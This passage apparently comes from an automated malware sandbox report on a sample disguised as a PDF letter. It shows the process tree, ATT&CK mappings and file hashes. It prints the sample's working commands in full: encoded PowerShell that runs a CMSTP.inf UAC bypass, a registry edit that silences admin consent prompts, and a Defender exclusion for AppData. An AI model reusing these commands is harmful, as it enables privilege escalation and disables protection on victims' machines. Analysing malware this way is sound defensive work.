GUAZgBhAHUAbAB0AEkAbgBzAHQAYQBsAGwAXQANAAoAQwB1AHMAdABvAG0ARABlAHMAdABpAG4AYQB0AGkAbwBuACAAPQAgAEMAdQBzAHQASQBuAHMAdABEAGUAcwB0AFMAZQBjAHQAaQBvAG4AQQBsAGwAVQBzAGUAcgBzAA0ACgBSAHUAbgBQAHIAZQBTAGUAdAB1AHAAQwBvAG0AbQBhAG4AZABzACAAPQAgAFIAdQBuAFAAcgBlAFMAZQB0AHUAcABDAG8AbQBtAGEAbgBkAHMAUwBlAGMAdABpAG8AbgANAAoAWwBSAHUAbgBQAHIAZQBTAGUAdAB1AHAAQwBvAG0AbQBhAG4AZABzAFMAZQBjAHQAaQBvAG4AXQANAAoAOwANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAcABvAHcAZQByAHMAaABlAGwAbAAgAC0ATgBvAEwAbwBnAG8AIAAtAFcAaQBuAGQAbwB3AFMAdAB5AGwAZQAgAGgAaQBkAGQAZQBuACAALQBOAG8AbgBJAG4AdABlAHIAYQBjAHQAaQB2AGUAIAAtAE4AbwBQAHIAbwBmAGkAbABlACAALQBFAHgAZQBjAHUAdABpAG8AbgBQAG8AbABpAGMAeQAgAFUAbgBSAGUAcwB0AHIAaQBjAHQAZQBkACAAUwBlAHQALQBJAHQAZQBtAFAAcgBvAHAAZQByAHQAeQAgAC0AUABhAHQAaAAgAFIARQBHAEkAUwBUAFIAWQA6ADoASABLAEUAWQBfAEwATwBDAEEATABfAE0AQQBDAEgASQBOAEUAXABTAG8AZgB0AHcAYQByAGUAXABNAGkAYwByAG8AcwBvAGYAdABcAFcAaQBuAGQAbwB3AHMAXABDAHUAcgByAGUAbgB0AFYAZQByAHMAaQBvAG4AXABQAG8AbABpAGMAaQBlAHMAXABTAHkAcwB0AGUAbQAgAC0ATgBhAG0AZQAgAEMAbwBuAHMAZQBuAHQAUAByAG8AbQBwAHQAQgBlAGgAYQB2AGkAbwByAEEAZABtAGkAbgAgAC0AVgBhAGwAdQBlACAAMAANAAoAJABDAG8AbQBtAGEAbgBkAFQAbwBFAHgAZQBjAHUAdABlAA0ACgB0AGEAcwBrAGsAaQBsAGwAIAAvAEkATQAgAGMAbQBzAHQAcAAuAGUAeABlACAALwBGAA0ACgBbAEMAdQBzAHQASQBuAHMAdABEAGUAcwB0AFMAZQBjAHQAaQBvAG4AQQBsAGwAVQBzAGUAcgBzAF0ADQAKADQAOQAwADAAMAAsADQAOQAwADAAMQA9AEEAbABsAFUAUwBlAHIAXwBMAEQASQBEAFMAZQBjAHQAaQBvAG4ALAAgADcADQAKAFsAQQBsAGwAVQBTAGUAcgBfAEwARABJAEQAUwBlAGMAdABpAG8AbgBdAA0ACgAiAEgASwBMAE0AIgAsACAAIgBTAE8ARgBUAFcAQQBSAEUAXABNAGkAYwByAG8AcwBvAGYAdABcAFcAaQBuAGQAbwB3AHMAXABDAHUAcgByAGUAbgB0AFYAZQByAHMAaQBvAG4AXABBAHAAcAAgAFAAYQB0AGgAcwBcAEMATQBNAEcAUgAzADIALgBFAFgARQAiACwAIAAiAFAAcgBvAGYAaQBsAGUASQBuAHMAdABhAGwAbABQAGEAdABoACIALAAgACIAJQBVAG4AZQB4AHAAZQBjAHQAZQBkAEUAcgByAG8AcgAlACIALAAgACIAIgANAAoAWwBTAHQAcgBpAG4AZwBzAF0ADQAKAFMAZQByAHYAaQBjAGUATgBhAG0AZQA9ACIATgBvAHQAZQBwAGEAZAAiAA0ACgBTAGgAbwByAHQAUwB2AGMATgBhAG0AZQA9ACIATgBvAHQAZQBwAGEAZAAiAA0ACgAiAEAAOwAkAEkAbgBmAEMAbwBuAHQAZQBuAHQAIAB8ACAATwB1AHQALQBGAGkAbABlACAAJABJAG4AZgBGAGkAbABlAEwAbwBjAGEAdABpAG8AbgAgAC0ARQBuAGMAbwBkAGkAbgBnACAAQQBTAEMASQBJAH0ARgB1AG4AYwB0AGkAbwBuACAARwBlAHQALQBIAHcAbgBkAHsAWwBDAG0AZABsAGUAdABCAGkAbgBkAGkAbgBnACgAKQBdAFAAYQByAGEAbQAoAFsAUABhAHIAYQBtAGUAdABlAHIAKABNAGEAbgBkAGEAdABvAHIAeQA9ACQAVAByAHUAZQAsAFYAYQBsAHUAZQBGAHIAbwBtAFAAaQBwAGUAbABpAG4AZQBCAHkAUAByAG8AcABlAHIAdAB5AE4AYQBtAGUAPQAkAFQAcgB1AGUAKQBdAFsAcwB0AHIAaQBuAGcAXQAkAFAAcgBvAGMAZQBzAHMATgBhAG0AZQApAFAAcgBvAGMAZQBzAHMAewAkAEUAcgByAG8AcgBBAGMAdABpAG8AbgBQAHIAZQBmAGUAcgBlAG4AYwBlAD0AJwBTAHQAbwBwACcAOwBUAHIAeQB7ACQAaAB3AG4AZAAgAD0AIABHAGUAdAAtAFAAcgBvAGMAZQBzAHMAIAAtAE4AYQBtAGUAIAAkAFAAcgBvAGMAZQBzAHMATgBhAG0AZQAgAHwAIABTAGUAbABlAGMAdAAtAE8AYgBqAGUAYwB0ACAALQBFAHgAcABhAG4AZABQAHIAbwBwAGUAcgB0AHkAIABNAGEAaQBuAFcAaQBuAGQAbwB3AEgAYQBuAGQAbABlADsAfQBDAGEAdABjAGgAewAkAGgAdwBuAGQAPQAkAG4AdQBsAGwAOwB9ACQAaABhAHMAaAA9AEAAewBQAHIAbwBjAGUAcwBzAE4AYQBtAGUAPQAkAFAAcgBvAGMAZQBzAHMATgBhAG0AZQA7AEgAdwBuAGQAPQAkAGgAdwBuAGQAOwB9ADsATgBlAHcALQBPAGIAagBlAGMAdAAgAC0AVAB5AHAAZQBOAGEAbQBlACAAUABzAE8AYgBqAGUAYwB0ACAALQBQAHIAbwBwAGUAcgB0AHkAIAAkAGgAYQBzAGgAfQB9AGYAdQBuAGMAdABpAG8AbgAgAFMAZQB0AC0AVwBpAG4AZABvAHcAQQBjAHQAaQB2AGUAewBbAEMAbQBkAGwAZQB0AEIAaQBuAGQAaQBuAGcAKAApAF0AUABhAHIAYQBtACgAWwBQAGEAcgBhAG0AZQB0AGUAcgAoAE0AYQBuAGQAYQB0AG8AcgB5AD0AJABUAHIAdQBlACwAVgBhAGwAdQBlAEYAcgBvAG0AUABpAHAAZQBsAGkAbgBlAEIAeQBQAHIAbwBwAGUAcgB0AHkATgBhAG0AZQA9ACQAVAByAHUAZQApAF0AWwBzAHQAcgBpAG4AZwBdACQATgBhAG0AZQApAFAAcgBvAGMAZQBzAHMAewAkAGgAdwBuAGQAPQBHAGUAdAAtAEgAdwBuAGQAIAAtAFAAcgBvAGMAZQBzAHMATgBhAG0AZQAgACQATgBhAG0AZQAgAHwAIABTAGUAbABlAGMAdAAtAE8AYgBqAGUAYwB0ACAALQBFAHgAcABhAG4AZABQAHIAbwBwAGUAcgB0AHkAIABIAHcAbgBkADsAWwBpAG4AdABdACQAaABhAG4AZABsAGUAPQAkAGgAdwBuAGQAOwBpAGYAKAAkAGgAYQBuAGQAbABlACAALQBnAHQAIAAwACkAewBbAHYAbwBpAGQAXQBbAFcAUABJAEEALgBDAG8AbgBzAG8AbABlAFUAdABpAGwAcwBdADoAOgBQAG8AcwB0AE0AZQBzAHMAYQBnAGUAKAAkAGgAYQBuAGQAbABlACwAWwBXAFAASQBBAC4AQwBvAG4AcwBvAGwAZQBVAHQAaQBsAHMAXQA6ADoAVwBNAF8AQwBIAEEAUgAsADEAMwAsADAAKQB9ACQAaABhAHMAaAA9AEAAewBQAHIAbwBjAGUAcwBzAD0AJABOAGEAbQBlADsASAB3AG4AZAA9ACQAaAB3AG4AZAB9ADsATgBlAHcALQBPAGIAagBlAGMAdAAgAC0AVAB5AHAAZQBOAGEAbQBlACAAUABzAE8AYgBqAGUAYwB0ACAALQBQAHIAbwBwAGUAcgB0AHkAIAAkAGgAYQBzAGgAfQB9ADsALgAgAFMAZQB0AC0ASQBOAEYARgBpAGwAZQA7AGEAZABkAC0AdAB5AHAAZQAgAC0AQQBzAHMAZQBtAGIAbAB5AE4AYQBtAGUAIABTAHkAcwB0AGUAbQAuAFcAaQBuAGQAbwB3AHMALgBGAG8AcgBtAHMAOwBJAGYAKABUAGUAcwB0AC0AUABhAHQAaAAgACQASQBuAGYARgBpAGwAZQBMAG8AYwBhAHQAaQBvAG4AKQB7AFMAdABhAHIAdAAtAFAAcgBvAGMAZQBzAHMAIABjAG0AcwB0AHAAIAAtAEEAcgBnAHUAbQBlAG4AdABMAGkAcwB0ACAAIgAvAGEAdQAgACIAIgAkAEkAbgBmAEYAaQBsAGUATABvAGMAYQB0AGkAbwBuACIAIgAiACAALQBXAGkAbgBkAG8AdwBTAHQAeQBsAGUAIABNAGkAbgBpAG0AaQB6AGUAZAA7AGQAbwB7AH0AdQBuAHQAaQBsACgAKABTAGUAdAAtAFcAaQBuAGQAbwB3AEEAYwB0AGkAdgBlACAAYwBtAHMAdABwACkALgBIAHcAbgBkACAALQBuAGUAIAAwACkAfQANAAoA
        8⤵
        Suspicious behavior: EnumeratesProcesses
        Suspicious use of AdjustPrivilegeToken
        Suspicious use of WriteProcessMemory
        
        PID:2416
        
        C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe
        
        "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\Admin\AppData\Local\Temp\vtgbvjjs\vtgbvjjs.cmdline"
        9⤵
        Suspicious use of WriteProcessMemory
        
        PID:1100
        
        C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe
        
        C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RESE3EC.tmp" "c:\Users\Admin\AppData\Local\Temp\vtgbvjjs\CSCD5C4DEC548B449E2BCD987A295A1DA8.TMP"
        10⤵
        
        PID:3368
        
        C:\Windows\system32\cmstp.exe
        
        "C:\Windows\system32\cmstp.exe" /au "C:\Users\Admin\AppData\Local\Temp\CMSTP.inf"
        9⤵
        
        PID:4436
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -WindowStyle hidden -ExecutionPolicy UnRestricted -Encoded DQAKAEEAZABkAC0AVAB5AHAAZQAgAC0ATgBhAG0AZQAgAEMAbwBuAHMAbwBsAGUAVQB0AGkAbABzACAALQBOAGEAbQBlAHMAcABhAGMAZQAgAFcAUABJAEEAIAAtAE0AZQBtAGIAZQByAEQAZQBmAGkAbgBpAHQAaQBvAG4AIABAACcADQAKAFsARABsAGwASQBtAHAAbwByAHQAKAAiAHUAcwBlAHIAMwAyAC4AZABsAGwAIgApAF0ADQAKAHAAdQBiAGwAaQBjACAAcwB0AGEAdABpAGMAIABlAHgAdABlAHIAbgAgAGkAbgB0ACAAUABvAHMAdABNAGUAcwBzAGEAZwBlACgAaQBuAHQAIABoAFcAbgBkACwAIAB1AGkAbgB0ACAATQBzAGcALAAgAGkAbgB0ACAAdwBQAGEAcgBhAG0ALAAgAGkAbgB0ACAAbABQAGEAcgBhAG0AKQA7AA0ACgBwAHUAYgBsAGkAYwAgAGMAbwBuAHMAdAAgAGkAbgB0ACAAVwBNAF8AQwBIAEEAUgAgAD0AIAAwAHgAMAAxADAAMAA7AA0ACgAnAEAADQAKAEYAdQBuAGMAdABpAG8AbgAgAHMAYwByAGkAcAB0ADoAUwBlAHQALQBJAE4ARgBGAGkAbABlACAAewBbAEMAbQBkAGwAZQB0AEIAaQBuAGQAaQBuAGcAKAApAF0AUABhAHIAYQBtACAAKAAkAEkAbgBmAEYAaQBsAGUATABvAGMAYQB0AGkAbwBuACAAPQAgACIAJABlAG4AdgA6AHQAZQBtAHAAXABDAE0AUwBUAFAALgBpAG4AZgAiACwAWwBTAHQAcgBpAG4AZwBdACQAQwBvAG0AbQBhAG4AZABUAG8ARQB4AGUAYwB1AHQAZQAgAD0AIAAnAEMAOgBcAFUAcwBlAHIAcwBcAEEAZABtAGkAbgBcAEEAcABwAEQAYQB0AGEAXABSAG8AYQBtAGkAbgBnAFwAcgBlAGcAaQBzAC4AZQB4AGUAIAAnACkAJABJAG4AZgBDAG8AbgB0AGUAbgB0AD0AQAAiAA0ACgBbAHYAZQByAHMAaQBvAG4AXQANAAoAUwBpAGcAbgBhAHQAdQByAGUAIAA9AGAAJABjAGgAaQBjAGEAZwBvAGAAJAANAAoAQQBkAHYAYQBuAGMAZQBkAEkATgBGACAAPQAgADIALgA1AA0ACgBbAEQAZQBmAGEAdQBsAHQASQBuAHMAdABhAGwAbABdAA0ACgBDAHUAcwB0AG8AbQBEAGUAcwB0AGkAbgBhAHQAaQBvAG4AIAA9ACAAQwB1AHMAdABJAG4AcwB0AEQAZQBzAHQAUwBlAGMAdABpAG8AbgBBAGwAbABVAHMAZQByAHMADQAKAFIAdQBuAFAAcgBlAFMAZQB0AHUAcABDAG8AbQBtAGEAbgBkAHMAIAA9ACAAUgB1AG4AUAByAGUAUwBlAHQAdQBwAEMAbwBtAG0AYQBuAGQAcwBTAGUAYwB0AGkAbwBuAA0ACgBbAFIAdQBuAFAAcgBlAFMAZQB0AHUAcABDAG8AbQBtAGEAbgBkAHMAUwBlAGMAdABpAG8AbgBdAA0ACgA7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAANAAoAJABDAG8AbQBtAGEAbgBkAFQAbwBFAHgAZQBjAHUAdABlAA0ACgB0AGEAcwBrAGsAaQBsAGwAIAAvAEkATQAgAGMAbQBzAHQAcAAuAGUAeABlACAALwBGAA0ACgBbAEMAdQBzAHQASQBuAHMAdABEAGUAcwB0AFMAZQBjAHQAaQBvAG4AQQBsAGwAVQBzAGUAcgBzAF0ADQAKADQAOQAwADAAMAAsADQAOQAwADAAMQA9AEEAbABsAFUAUwBlAHIAXwBMAEQASQBEAFMAZQBjAHQAaQBvAG4ALAAgADcADQAKAFsAQQBsAGwAVQBTAGUAcgBfAEwARABJAEQAUwBlAGMAdABpAG8AbgBdAA0ACgAiAEgASwBMAE0AIgAsACAAIgBTAE8ARgBUAFcAQQBSAEUAXABNAGkAYwByAG8AcwBvAGYAdABcAFcAaQBuAGQAbwB3AHMAXABDAHUAcgByAGUAbgB0AFYAZQByAHMAaQBvAG4AXABBAHAAcAAgAFAAYQB0AGgAcwBcAEMATQBNAEcAUgAzADIALgBFAFgARQAiACwAIAAiAFAAcgBvAGYAaQBsAGUASQBuAHMAdABhAGwAbABQAGEAdABoACIALAAgACIAJQBVAG4AZQB4AHAAZQBjAHQAZQBkAEUAcgByAG8AcgAlACIALAAgACIAIgANAAoAWwBTAHQAcgBpAG4AZwBzAF0ADQAKAFMAZQByAHYAaQBjAGUATgBhAG0AZQA9ACIATgBvAHQAZQBwAGEAZAAiAA0ACgBTAGgAbwByAHQAUwB2AGMATgBhAG0AZQA9ACIATgBvAHQAZQBwAGEAZAAiAA0ACgAiAEAAOwAkAEkAbgBmAEMAbwBuAHQAZQBuAHQAIAB8ACAATwB1AHQALQBGAGkAbABlACAAJABJAG4AZgBGAGkAbABlAEwAbwBjAGEAdABpAG8AbgAgAC0ARQBuAGMAbwBkAGkAbgBnACAAQQBTAEMASQBJAH0ARgB1AG4AYwB0AGkAbwBuACAARwBlAHQALQBIAHcAbgBkAHsAWwBDAG0AZABsAGUAdABCAGkAbgBkAGkAbgBnACgAKQBdAFAAYQByAGEAbQAoAFsAUABhAHIAYQBtAGUAdABlAHIAKABNAGEAbgBkAGEAdABvAHIAeQA9ACQAVAByAHUAZQAsAFYAYQBsAHUAZQBGAHIAbwBtAFAAaQBwAGUAbABpAG4AZQBCAHkAUAByAG8AcABlAHIAdAB5AE4AYQBtAGUAPQAkAFQAcgB1AGUAKQBdAFsAcwB0AHIAaQBuAGcAXQAkAFAAcgBvAGMAZQBzAHMATgBhAG0AZQApAFAAcgBvAGMAZQBzAHMAewAkAEUAcgByAG8AcgBBAGMAdABpAG8AbgBQAHIAZQBmAGUAcgBlAG4AYwBlAD0AJwBTAHQAbwBwACcAOwBUAHIAeQB7ACQAaAB3AG4AZAAgAD0AIABHAGUAdAAtAFAAcgBvAGMAZQBzAHMAIAAtAE4AYQBtAGUAIAAkAFAAcgBvAGMAZQBzAHMATgBhAG0AZQAgAHwAIABTAGUAbABlAGMAdAAtAE8AYgBqAGUAYwB0ACAALQBFAHgAcABhAG4AZABQAHIAbwBwAGUAcgB0AHkAIABNAGEAaQBuAFcAaQBuAGQAbwB3AEgAYQBuAGQAbABlADsAfQBDAGEAdABjAGgAewAkAGgAdwBuAGQAPQAkAG4AdQBsAGwAOwB9ACQAaABhAHMAaAA9AEAAewBQAHIAbwBjAGUAcwBzAE4AYQBtAGUAPQAkAFAAcgBvAGMAZQBzAHMATgBhAG0AZQA7AEgAdwBuAGQAPQAkAGgAdwBuAGQAOwB9ADsATgBlAHcALQBPAGIAagBlAGMAdAAgAC0AVAB5AHAAZQBOAGEAbQBlACAAUABzAE8AYgBqAGUAYwB0ACAALQBQAHIAbwBwAGUAcgB0AHkAIAAkAGgAYQBzAGgAfQB9AGYAdQBuAGMAdABpAG8AbgAgAFMAZQB0AC0AVwBpAG4AZABvAHcAQQBjAHQAaQB2AGUAewBbAEMAbQBkAGwAZQB0AEIAaQBuAGQAaQBuAGcAKAApAF0AUABhAHIAYQBtACgAWwBQAGEAcgBhAG0AZQB0AGUAcgAoAE0AYQBuAGQAYQB0AG8AcgB5AD0AJABUAHIAdQBlACwAVgBhAGwAdQBlAEYAcgBvAG0AUABpAHAAZQBsAGkAbgBlAEIAeQBQAHIAbwBwAGUAcgB0AHkATgBhAG0AZQA9ACQAVAByAHUAZQApAF0AWwBzAHQAcgBpAG4AZwBdACQATgBhAG0AZQApAFAAcgBvAGMAZQBzAHMAewAkAGgAdwBuAGQAPQBHAGUAdAAtAEgAdwBuAGQAIAAtAFAAcgBvAGMAZQBzAHMATgBhAG0AZQAgACQATgBhAG0AZQAgAHwAIABTAGUAbABlAGMAdAAtAE8AYgBqAGUAYwB0ACAALQBFAHgAcABhAG4AZABQAHIAbwBwAGUAcgB0AHkAIABIAHcAbgBkADsAWwBpAG4AdABdACQAaABhAG4AZABsAGUAPQAkAGgAdwBuAGQAOwBpAGYAKAAkAGgAYQBuAGQAbABlACAALQBnAHQAIAAwACkAewBbAHYAbwBpAGQAXQBbAFcAUABJAEEALgBDAG8AbgBzAG8AbABlAFUAdABpAGwAcwBdADoAOgBQAG8AcwB0AE0AZQBzAHMAYQBnAGUAKAAkAGgAYQBuAGQAbABlACwAWwBXAFAASQBBAC4AQwBvAG4AcwBvAGwAZQBVAHQAaQBsAHMAXQA6ADoAVwBNAF8AQwBIAEEAUgAsADEAMwAsADAAKQB9ACQAaABhAHMAaAA9AEAAewBQAHIAbwBjAGUAcwBzAD0AJABOAGEAbQBlADsASAB3AG4AZAA9ACQAaAB3AG4AZAB9ADsATgBlAHcALQBPAGIAagBlAGMAdAAgAC0AVAB5AHAAZQBOAGEAbQBlACAAUABzAE8AYgBqAGUAYwB0ACAALQBQAHIAbwBwAGUAcgB0AHkAIAAkAGgAYQBzAGgAfQB9ADsALgAgAFMAZQB0AC0ASQBOAEYARgBpAGwAZQA7AGEAZABkAC0AdAB5AHAAZQAgAC0AQQBzAHMAZQBtAGIAbAB5AE4AYQBtAGUAIABTAHkAcwB0AGUAbQAuAFcAaQBuAGQAbwB3AHMALgBGAG8AcgBtAHMAOwBJAGYAKABUAGUAcwB0AC0AUABhAHQAaAAgACQASQBuAGYARgBpAGwAZQBMAG8AYwBhAHQAaQBvAG4AKQB7AFMAdABhAHIAdAAtAFAAcgBvAGMAZQBzAHMAIABjAG0AcwB0AHAAIAAtAEEAcgBnAHUAbQBlAG4AdABMAGkAcwB0ACAAIgAvAGEAdQAgACIAIgAkAEkAbgBmAEYAaQBsAGUATABvAGMAYQB0AGkAbwBuACIAIgAiACAALQBXAGkAbgBkAG8AdwBTAHQAeQBsAGUAIABNAGkAbgBpAG0AaQB6AGUAZAA7AGQAbwB7AH0AdQBuAHQAaQBsACgAKABTAGUAdAAtAFcAaQBuAGQAbwB3AEEAYwB0AGkAdgBlACAAYwBtAHMAdABwACkALgBIAHcAbgBkACAALQBuAGUAIAAwACkAfQANAAoA
        8⤵
        Suspicious behavior: EnumeratesProcesses
        Suspicious use of AdjustPrivilegeToken
        Suspicious use of WriteProcessMemory
        
        PID:2012
        
        C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe
        
        "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\Admin\AppData\Local\Temp\of4xy52f\of4xy52f.cmdline"
        9⤵
        Suspicious use of WriteProcessMemory
        
        PID:2836
        
        C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe
        
        C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RESF7B3.tmp" "c:\Users\Admin\AppData\Local\Temp\of4xy52f\CSCFEFBDBABB5E2462DA5AF3820FE76EA1.TMP"
        10⤵
        
        PID:2664
        
        C:\Windows\system32\cmstp.exe
        
        "C:\Windows\system32\cmstp.exe" /au "C:\Users\Admin\AppData\Local\Temp\CMSTP.inf"
        9⤵
        
        PID:812

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell -NoLogo -WindowStyle hidden -NonInteractive -NoProfile -ExecutionPolicy UnRestricted Set-ItemProperty -Path REGISTRY::HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Policies\System -Name ConsentPromptBehaviorAdmin -Value 0
1⤵
- UAC bypass
- Drops file in System32 directory
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:1496

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell.exe -NoLogo -WindowStyle hidden -NonInteractive -NoProfile -ExecutionPolicy UnRestricted Add-MpPreference -ExclusionPath $env:AppData
1⤵
- Drops file in System32 directory
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:4424

C:\Windows\system32\taskkill.exe
taskkill /IM cmstp.exe /F
1⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:2060

C:\Windows\System32\CompPkgSrv.exe
C:\Windows\System32\CompPkgSrv.exe -Embedding
1⤵
PID:976

Network

MITRE ATT&CK Enterprise v6

Initial Access

Execution

Persistence

Privilege Escalation

Bypass User Account Control

T1088

Defense Evasion

Bypass User Account Control

T1088

Disabling Security Tools

T1089

Modify Registry

T1112

Credential Access

Discovery

Query Registry

T1012

System Information Discovery

T1082

Lateral Movement

Collection

Command and Control

Exfiltration

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\powershell.exe.log

Filesize
3KB

MD5
26882684a58bf6793081b41591301a56

SHA1
275f7cfc1f4bffef3c3db27559e9b1db3e437845

SHA256
2dd4ace99d03fac0ace573957b0efa8a6f928487a59e2ff47f77cab1e35ceb7e

SHA512
77e77d17105b4dc3c76c52ea7dc36ef62e8fa1c6ee90b3129d8b3f5c593da3ab8522746dddbdb0170068966c586747d2201145ee1d738082d9d5a390a376c71c

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

Filesize
1KB

MD5
758bc803b1aff2a24cc7c984a44f9d22

SHA1
8032463a447479fcd66574ecd1d7a738f5281bae

SHA256
37274e97a962bf7e17a41ea586acb728809cd7fbb3e23cc5321097d7b2cfe64c

SHA512
2873277c00952f0a4619c5e2b33ba2cb0f527d68da63498149ae5ca173fb28d314acafe39872fca332afac53ed3048ffe1d2183c4bf02d2ffab35b1f67d93d56

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

Filesize
1KB

MD5
4ad7d649983ab4b5f7cef9df499f8d38

SHA1
b4cc7566ee36ca5ae7a59101c870807336026875

SHA256
bcde0bbb65482f72e384a2e27959288917cbe7c0e9ee74f3cdbacc4556ac3b47

SHA512
6c893f9140abe88039bf6cf4059f31533f33187758d3928793febbcbbbd9f2a68a00815397cb239c68c46655efb197326ad94f27e4e40be083e0d41072f4642d

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

Filesize
1KB

MD5
fc28168b916bf9744961653d503e1164

SHA1
71deadab13b81a414582f931e9af010152463644

SHA256
a2a78e9fb30fe365d454ca6bbbf950355049c978262fdf0e80cd683622cf00e9

SHA512
08d828e18ccb2892f12dcbbaf5a5ffcafb4e2e768536fc46b3d2fce788c52b2f61058e1ef0a47e648e2308f4f1aeb8799bef9472726d2800fa9b775f401e08c9

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

Filesize
1KB

MD5
9af72b81f0729a2b4211bb1bdb92c674

SHA1
4f93e49f4571b9b79d1f737dce7d8673b2a34070

SHA256
79b58227ffbf76f0a13781811310458e45f1a15429f3e960d44a49edc3642d30

SHA512
0f7abc929b94c8756866ff7122a4ab1fac809f9427686b96a019b09cf6c6509f26084559bffbc4f51a469cb5312cb41b0984693536f18c2c91db6969bdb88cf4

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

Filesize
1KB

MD5
38626e78f952256a721176512a7f8c26

SHA1
70636067d2b0ec031d6912faba82a8665fa54a08

SHA256
ce79b9265cd36fec49cda6c92664354a8b6448bcf28bc13ff8b318b3b80c756d

SHA512
49005e71061285d59144a8551bb9b317694a64b383c64ec6e3c34308371a95b8fbac7356c2a8eb15477030f9aee10b347bca4f95601ba4b262eb3df0ec22c0d2

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

Filesize
1KB

MD5
3ff35e2b7cca4fb8228ddf913a09cbda

SHA1
eedd4751cec2a24771433befa5b362e84057b3e0

SHA256
286e2f81e0b6cb7ae613b553fbb1ba1ffcfff0669e6a56b466b4dbb45267663a

SHA512
cf066873956e607e6dceaaa7a8b9cdafae93cd955bdd5f4a15bf419dd94e207b61f98142440799ab0131c56d2aed5ed5d153fe3edcce1e5474e6f74599289bef

Download Submit
C:\Users\Admin\AppData\Local\Temp\CMSTP.inf

Filesize
907B

MD5
41b908bf197329aec4d782135905ec65

SHA1
ab184dfbdb665e00f3503464f723a1810efb675c

SHA256
a6056054ae5916bb2ef4cd394af1fb6dba6dafb58208d2fa377945081e9b48b3

SHA512
bbf8a7f1d8700dd188ed55f239555b73254fe9676c0894cff8b84e24017a36893601dd00e2738f5650355e667d2e137dac522ecf6f022461b40850f482a2e854

Download Submit
C:\Users\Admin\AppData\Local\Temp\CMSTP.inf

Filesize
556B

MD5
ec6cd57ad37b4127fc21a641b253bd1f

SHA1
02cb41b0a9f1e82b24697cd2428aae12bdf03097

SHA256
35e3d5b71c0728d5417e4f983e846c43ef336bcafbd2864288289eb4c946acd2

SHA512
b000246311b450a8152014d92de1657f1954afeaaa9390713cc2a3da8bbdb95df15e3928eee726c569fd04311eb6eef2ea5b32ed7debade6cb9ee2f6df98b749

Download Submit
C:\Users\Admin\AppData\Local\Temp\RESE3EC.tmp

Filesize
1KB

MD5
70dcb5ccf439a2eac578da398a9b9675

SHA1
4595e9e60bf8c35f1295243f9e7aa496c80db75a

SHA256
f1519d18ea34e96570967a6989160979df99ca0d3f7253840dbcc06dafc0b096

SHA512
71cade0d48de317211580b57faf9648f0c26d859bbb1fa9124c1054f38e95306cd63294f00c164b3f6e00ddd0573168dde54df2d0aff4929d5f11a3744f39334

Download Submit
C:\Users\Admin\AppData\Local\Temp\RESF7B3.tmp

Filesize
1KB

MD5
640edec3ad6a84a0ee22d145da60fc5d

SHA1
86581e0ca4774f1a6d5a4040f70522f691be3777

SHA256
923a35547c5fbc8f54cf0e93f2ba73f4a5cedf885c0c9e257fffc5e37f13c1cd

SHA512
9d35299dbbf53224c37cb23e2bb27a0c7c18c224bab42cffbf6e35c0beb5186d83f679199dde76fd3a1ff82e190e3f57685b37c0726841c56c0452aedea87a7d

Download Submit
C:\Users\Admin\AppData\Local\Temp\of4xy52f\of4xy52f.dll

Filesize
3KB

MD5
95cc9448533ce6d42e6daced09fd8237

SHA1
9e13597be135db104fcbdc92258d9a5c797c68f9

SHA256
5524f2f088b1715f3813e884f3c94e5cd34f73e89bd3a4828356800eefde9024

SHA512
2bc2e342045c066f6b3b1b7ce92cf625dda92c80b8e237f0520d471e5f1e306fc9e65f8b78c6274e48f81398030a2e3e9359fb0c7bcbd99c83f5a6ff46065909

Download Submit
C:\Users\Admin\AppData\Local\Temp\vtgbvjjs\vtgbvjjs.dll

Filesize
3KB

MD5
f53e499617b1368d831d9162dacd881e

SHA1
36b48c7bc92c50a5bd290e773f974a6b15fc3605

SHA256
4a5eee04d5ae6585a0bf8f9684d2e4148e892121e6ab12732eda65dc89825147

SHA512
98c7e5ed53d502e1573774174c44422e272e13d3c541d98454454cf346cde4142f329e99403c96f46c8e6062ed58f24cd519209de2922e54d8f9cf172dfce8b3

Download Submit
C:\Users\Admin\AppData\Roaming\Letter_Of_Intention.pdf

Filesize
13KB

MD5
1c4082b6ef3888c053a4922b5bf36177

SHA1
792082709c5ed84ef672858efa83cdaa427bb775

SHA256
a7486560f6aa20a056f1ebac4d7e30a2a84d9fb306a8019ccb5c651f0a63d8f7

SHA512
f9e7f5979e9dbc55435bceb826b03434cd1f4b844637820be570412c1fa53410a5fa1063e38c589e8829fa7261f589580c4b4693e81f8f39f61610e0f60fef53

Download Submit
